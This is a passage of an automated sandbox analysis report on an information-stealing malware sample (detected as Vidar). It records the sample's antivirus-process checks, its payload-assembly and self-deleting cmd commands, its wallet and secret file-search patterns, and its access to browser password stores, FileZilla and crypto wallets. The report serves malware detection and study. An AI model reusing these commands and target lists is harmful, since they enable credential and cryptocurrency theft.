                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0016C622 FindFirstFileExW,12_2_0016C622
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A66DC FindFirstFileW,FindNextFileW,FindClose,12_2_001A66DC
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A7333 FindFirstFileW,FindClose,12_2_001A7333
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_001A73D4
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0019D921
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00135FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00135FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\680662Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\680662\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: 58YU37.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: chrome.exe, 00000012.00000002.2812352313.0000278000B44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: 58YU37.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 58YU37.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                Source: chrome.exe, 00000012.00000002.2810617984.0000278000680000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                Source: Billion.com, 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCBE0A7645AEA3A51
                Source: 58YU37.12.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 58YU37.12.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 58YU37.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 58YU37.12.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000015.00000003.2860520871.00002660002B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: 58YU37.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 58YU37.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 58YU37.12.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 58YU37.12.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 58YU37.12.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: 58YU37.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: chrome.exe, 00000012.00000002.2804727750.000002584920B000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2878921509.0000015CA5644000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2988186781.000002B254643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 58YU37.12.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 58YU37.12.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 58YU37.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 58YU37.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: chrome.exe, 00000012.00000002.2812095120.0000278000A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=b6e1958d-ab33-48d8-813d-6a77e8b9dd9c
                Source: 58YU37.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 58YU37.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 58YU37.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 58YU37.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 58YU37.12.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 58YU37.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 58YU37.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 58YU37.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 58YU37.12.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 58YU37.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 58YU37.12.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 58YU37.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 58YU37.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 58YU37.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AF4FF BlockInput,12_2_001AF4FF
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0013338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0013338B
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00155058 mov eax, dword ptr fs:[00000030h]12_2_00155058
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001920AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,12_2_001920AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00162992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00162992
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00150BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00150BAF
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00150D45 SetUnhandledExceptionFilter,12_2_00150D45
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00150F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00150F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: Billion.com PID: 1396, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00191B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00191B4D
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0013338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0013338B
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019BBED SendInput,keybd_event,12_2_0019BBED
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019EC6C mouse_event,12_2_0019EC6C
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 680662Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E MemoJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "OBTAINING" Compensation Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard TJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\680662\Billion.com Billion.com TJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "c:\program files (x86)\microsoft\edge\application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.winrtappidservice --lang=en-gb --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "c:\program files (x86)\microsoft\edge\application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.winrtappidservice --lang=en-gb --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001914AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_001914AE
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00191FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00191FB0
                Source: Billion.com, 0000000C.00000000.2151331221.00000000001F3000.00000002.00000001.01000000.00000007.sdmp, Shipping.9.dr, Billion.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Billion.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00150A08 cpuid 12_2_00150A08
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0018E5F4 GetLocalTime,12_2_0018E5F4
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0018E652 GetUserNameW,12_2_0018E652
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0016BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0016BCD2
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 12.2.Billion.com.4390000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3327789976.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2541052285.0000000004391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Billion.com PID: 1396, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: info.seco
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: .*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: seed.seco
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Billion.com, 0000000C.00000002.3329936932.000000000453C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
